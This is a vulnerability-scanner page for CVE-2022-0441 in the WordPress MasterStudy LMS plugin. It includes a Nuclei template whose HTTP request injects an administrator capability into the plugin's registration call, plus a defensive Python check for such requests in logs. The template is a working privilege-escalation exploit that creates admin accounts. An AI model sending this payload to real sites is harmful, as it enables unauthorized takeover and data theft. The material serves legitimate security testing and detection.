MasterStudy LMS <2.7.6 - Improper Access Control
ID: CVE-2022-0441
Severity: critical
Author: dwisiswant0,theamanrawat
Tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes
Description
WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
id: CVE-2022-0441

info:
  name: MasterStudy LMS <2.7.6 - Improper Access Control
  author: dwisiswant0,theamanrawat
  severity: critical
  description: |
    WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially compromising user data and system integrity.
  remediation: |
    Upgrade to the latest version of the MasterStudy LMS plugin (2.7.6 or higher) to fix the improper access control issue.
  reference:
    - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
    - https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
    - https://plugins.trac.wordpress.org/changeset/2667195
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0441
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0441
    cwe-id: CWE-269,NVD-CWE-Other
    epss-score: 0.18749
    epss-percentile: 0.95799
    cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: stylemixthemes
    product: masterstudy_lms
    framework: wordpress
  tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes

variables:
  username: "{{to_lower(rand_text_alphanumeric(6))}}"
  password: "{{rand_text_alphanumeric(12)}}"
  user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/json

        {"user_login":"{{username}}","user_email":"{{user_email}}","user_password":"{{password}}","user_password_re":"{{password}}","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'Registration completed successfully'
          - '"status":"success"'
        condition: and

      - type: word
        part: header_2
        words:
          - application/json;

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"stm_lms_register":"([0-9a-z]+)"'
        internal: true

      - type: kval
        kval:
          - user_email
          - password
# digest: 4a0a00473045022100de04257b64828fea8d5aae56b0011808c9acef595cce49810aef0020a55aa0f9022023566b7e3ada57f0617b3d1cdc43a5a7cfde95c87341a5f79ec695b70094584e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0441.yaml"
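
For the defensive side of the same check, the following added example (not part of the template or of the plugin's code) inspects logged registration requests and reports any JSON key that names a WordPress role or capability meta field. It assumes request bodies are available, for example from a WAF or reverse-proxy audit log; the function names and sample requests are constructed for illustration, and the match on `<prefix>capabilities` / `<prefix>user_level` generalises the template's `wp_capabilities` key to sites with a non-default table prefix.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

# WordPress stores roles in usermeta as "<table_prefix>capabilities" and
# "<table_prefix>user_level"; the prefix is "wp_" by default but configurable.
PRIVILEGED_META = re.compile(r"(capabilities|user_level)$", re.IGNORECASE)
REGISTER_ACTION = "stm_lms_register"  # AJAX action used by the template above


def find_privileged_keys(node, path=""):
    """Recursively collect JSON paths whose key names a role/capability field."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else key
            if PRIVILEGED_META.search(key):
                hits.append(here)
            hits.extend(find_privileged_keys(value, here))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_privileged_keys(item, f"{path}[{i}]"))
    return hits


def inspect_request(method, url, body):
    """Return offending JSON paths for a registration request, else []."""
    query = parse_qs(urlsplit(url).query)
    if method.upper() != "POST" or REGISTER_ACTION not in query.get("action", []):
        return []
    try:
        payload = json.loads(body)
    except (ValueError, TypeError):
        return []  # not JSON: outside the scope of this check
    return find_privileged_keys(payload)


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", "/wp-admin/admin-ajax.php?action=stm_lms_register&nonce=abc123",
     '{"user_login":"alice","profile_default_fields_for_register":'
     '{"wp_capabilities":{"value":{"administrator":1}}}}'),
    ("POST", "/wp-admin/admin-ajax.php?action=stm_lms_register&nonce=abc123",
     '{"user_login":"bob","profile_default_fields_for_register":'
     '{"first_name":{"value":"Bob"}}}'),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(url, "->", inspect_request(method, url, body) or "clean")
```

Any account whose registration request is flagged this way should be reviewed in the WordPress user list and its role confirmed, regardless of whether the plugin has since been upgraded.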